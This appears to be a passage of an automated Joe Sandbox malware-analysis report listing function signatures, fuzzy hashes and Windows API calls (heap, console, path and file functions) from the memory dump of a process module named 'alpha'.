                                                                              • Instruction ID: c160dc385bbc9ea9aaf0ee7b1ce2e3ea26720aab58dd353c5333071086da407d
                                                                              • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                              • Instruction Fuzzy Hash: ED11912191C64292EB5EBF14E9440B9B261EB5CBF0F946331D67D832F6EF2CE4558740
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                              • API String ID: 1646373207-2530943252
                                                                              • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                              • Instruction ID: 886155444c70f446a74c6d09214fe5a26b6a8292c11058f439006e3b61b78a7d
                                                                              • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                              • Instruction Fuzzy Hash: 2901C8A1B0DA06D1EA5CBF25E851134A2A0AF4D771F484736C93EC27F2DEBCA9819700
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: RaiseFailFastException$kernelbase.dll
                                                                              • API String ID: 1646373207-919018592
                                                                              • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                              • Instruction ID: b26996117113f076778bd58b074d6106c17336e6f9344d0c779fd4efc0c8da17
                                                                              • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                              • Instruction Fuzzy Hash: 6DF0B761A1CB91D2EA08BF12F444069EA60EB8DF90B889535DA5E87B36CF6CD6958700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$CurrentDirectorytowupper
                                                                              • String ID:
                                                                              • API String ID: 1403193329-0
                                                                              • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                              • Instruction ID: 5b948392a2fd215b8b9496cbac39085a4720469a6015ec1a1816d0a7c1ccb033
                                                                              • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                              • Instruction Fuzzy Hash: C3619D32A08B828AE728FF65D8402BDB7A4FB48348F145135DE6D836AADF38D451C700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsnicmp$wcschr
                                                                              • String ID:
                                                                              • API String ID: 3270668897-0
                                                                              • Opcode ID: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                                                              • Instruction ID: e100c90a714fcf47b6fe56778d0b3a977615de46e10dcbbf9218f6822292ea22
                                                                              • Opcode Fuzzy Hash: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                                                              • Instruction Fuzzy Hash: 6A518A51B0C74281FA69BF15E4101B9E3A5EF4DB80F48D431CA2E876F7EEACE9418350
                                                                              APIs
                                                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,0000000A,00007FF64B5692AC), ref: 00007FF64B5730CA
                                                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64B5730DD
                                                                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B5730F6
                                                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64B573106
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$FullNamePathwcschr
                                                                              • String ID:
                                                                              • API String ID: 1464828906-0
                                                                              • Opcode ID: 4608740039e49971374e978e9372c54a28b1034dfcf154244c984753711d5cb1
                                                                              • Instruction ID: 5121a60534c5088da3f425ffc7bd9783b1c035491c451f9f846efbbc24ff5113
                                                                              • Opcode Fuzzy Hash: 4608740039e49971374e978e9372c54a28b1034dfcf154244c984753711d5cb1
                                                                              • Instruction Fuzzy Hash: 6631D021B0C71A82E628BF15E40047EF761EB4DB90F54C634DA6AC33F2DEBDA8468700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$DriveFullNamePathType
                                                                              • String ID:
                                                                              • API String ID: 3442494845-0
                                                                              • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                              • Instruction ID: 78de0b59b98a57ed9cfc05a0f9a0eecbe6b0d763b9a601f6e80be3840d7e4492
                                                                              • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                              • Instruction Fuzzy Hash: 36318C32619BC5CAEB64EF11E8402E9B3A4FB8CB84F444125DA5D87B65CF38D645C700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                              • String ID:
                                                                              • API String ID: 140117192-0
                                                                              • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                              • Instruction ID: cfa12f293f86497b7d0ce65da92497bcf9422f509596eb44e01b0271735e66e7
                                                                              • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                              • Instruction Fuzzy Hash: 9941D3B5A0CB41D1EA58BF08F980369A3A4FB8C784F504136DAAD827B6EF7CE544D700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcstol$lstrcmp
                                                                              • String ID:
                                                                              • API String ID: 3515581199-0
                                                                              • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                              • Instruction ID: 4d3ecf475a875306e5fc62bb377aad81af42ce388ff10c956add3c9fa5f5293d
                                                                              • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                              • Instruction Fuzzy Hash: 1121C172B0C642C3E6687F7AE49413AEAA0FF4D794F159034CB6F82676DEACE4448600
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: File_get_osfhandle$TimeWrite
                                                                              • String ID:
                                                                              • API String ID: 4019809305-0
                                                                              • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                              • Instruction ID: 6083a5cd3d6902f9a52a75f20508cb0a78bd32e5043c4f03135e5fff570de42f
                                                                              • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                              • Instruction Fuzzy Hash: 46316121A1C68687EB987F14E444378FA91AF4EB54F145238D96D83BF7CF7DD8948A00
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$DriveNamePathTypeVolume
                                                                              • String ID:
                                                                              • API String ID: 1029679093-0
                                                                              • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                              • Instruction ID: 2ea6c28de2d308244176cba7066b5bb8fdc11caae7bbcfadf9d531c5519294b5
                                                                              • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                              • Instruction Fuzzy Hash: 71315A72709AC1CAEB24AF21D8543E8A7A0FB8DB88F444135CA5D87755DF3CD655C700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                              • String ID:
                                                                              • API String ID: 2448200120-0
                                                                              • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                              • Instruction ID: 2932bc57e44498076e95111d923c14ceea99f3b289695ac3a489c186c03eba85
                                                                              • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                              • Instruction Fuzzy Hash: D1211A31A1CA46CBE6587F11E80027DF6A1EB8DB81F544539DA6E977A6CF3CE4528A00
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcess
                                                                              • String ID:
                                                                              • API String ID: 1617791916-0
                                                                              • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                              • Instruction ID: 607175b9ee96f088fde5204cf0bb133fa0feda4842628f1e86e4902f0e1cf2bb
                                                                              • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                              • Instruction Fuzzy Hash: 86213D61B0DA41C6EA08BF55E910479E7A1EB8DBD0F589230DA2E877B6DE7CE4058600
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B573C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B573D0C
                                                                                • Part of subcall function 00007FF64B573C24: towupper.MSVCRT ref: 00007FF64B573D2F
                                                                                • Part of subcall function 00007FF64B573C24: iswalpha.MSVCRT ref: 00007FF64B573D4F
                                                                                • Part of subcall function 00007FF64B573C24: towupper.MSVCRT ref: 00007FF64B573D75
                                                                                • Part of subcall function 00007FF64B573C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B573DBF
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925,?,?,?,?,00007FF64B56B9B1), ref: 00007FF64B566ABF
                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925,?,?,?,?,00007FF64B56B9B1), ref: 00007FF64B566AD3
                                                                                • Part of subcall function 00007FF64B566B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF64B566AE8,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566B8B
                                                                                • Part of subcall function 00007FF64B566B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF64B566AE8,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566B97
                                                                                • Part of subcall function 00007FF64B566B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF64B566AE8,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566BAF
                                                                                • Part of subcall function 00007FF64B566B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B566AF1,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566B39
                                                                                • Part of subcall function 00007FF64B566B30: RtlFreeHeap.NTDLL(?,?,?,00007FF64B566AF1,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566B4D
                                                                                • Part of subcall function 00007FF64B566B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B566AF1,?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925), ref: 00007FF64B566B59
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925,?,?,?,?,00007FF64B56B9B1), ref: 00007FF64B566B03
                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF64B58EA0F,?,?,?,00007FF64B58E925,?,?,?,?,00007FF64B56B9B1), ref: 00007FF64B566B17
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                              • String ID:
                                                                              • API String ID: 3512109576-0
                                                                              • Opcode ID: 382550a8889551dd1746f9e05062d813c656d27a38cd142319c153c86f485295
                                                                              • Instruction ID: a168f4e345bd44f8360438def0dd496e93eddb39a3ad319ac62caadf2f10a295
                                                                              • Opcode Fuzzy Hash: 382550a8889551dd1746f9e05062d813c656d27a38cd142319c153c86f485295
                                                                              • Instruction Fuzzy Hash: 0E213E62A1DA86C6EB08BF65D4142B8BBA0EF5DB45F149035CA2E87376DF2CA445C350
                                                                              APIs
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56AF82), ref: 00007FF64B56B6D0
                                                                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56AF82), ref: 00007FF64B56B6E7
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56AF82), ref: 00007FF64B56B701
                                                                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56AF82), ref: 00007FF64B56B715
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$AllocSize
                                                                              • String ID:
                                                                              • API String ID: 2549470565-0
                                                                              • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                              • Instruction ID: 1fb132f81fb6ff4cc290d04afb98bc9060544de4570a06264b975538d8eae7f4
                                                                              • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                              • Instruction Fuzzy Hash: F9213062A0D686C6EE1CBF15E44107CF6A1FB8CB80B48A431DA6E83772DF7CE5458700
APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF64B57507A), ref: 00007FF64B58D01C
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF64B57507A), ref: 00007FF64B58D033
• FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF64B57507A), ref: 00007FF64B58D06D
• SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF64B57507A), ref: 00007FF64B58D07F
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
• String ID:
• API String ID: 1033415088-0
• Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
• Instruction ID: 66be31c84d7d3fbc2885ce01fd38e76b6e2fe21fb8add5cfbb28073cb071bd91
• Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
• Instruction Fuzzy Hash: AE11513161C642C7D6486B11F45517AF7E0FB8EB95F405125EA9E87BA5DF3CD0458B00
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF64B585433,?,?,?,00007FF64B5869B8,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B5856C5
• RtlFreeHeap.NTDLL(?,?,00000028,00007FF64B585433,?,?,?,00007FF64B5869B8,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B5856D9
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF64B585433,?,?,?,00007FF64B5869B8,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B5856FD
• RtlFreeHeap.NTDLL(?,?,00000028,00007FF64B585433,?,?,?,00007FF64B5869B8,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B585711
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
• Instruction ID: 306446bb24485c6a1632d1ded80a2a3e160eebb33f4dfe213353dda41140a68c
• Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
• Instruction Fuzzy Hash: B7114C72A08B81C6DB04AF56F4040ACBBB0F74DF84B488125DB5E43729DF38E556C740
APIs
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
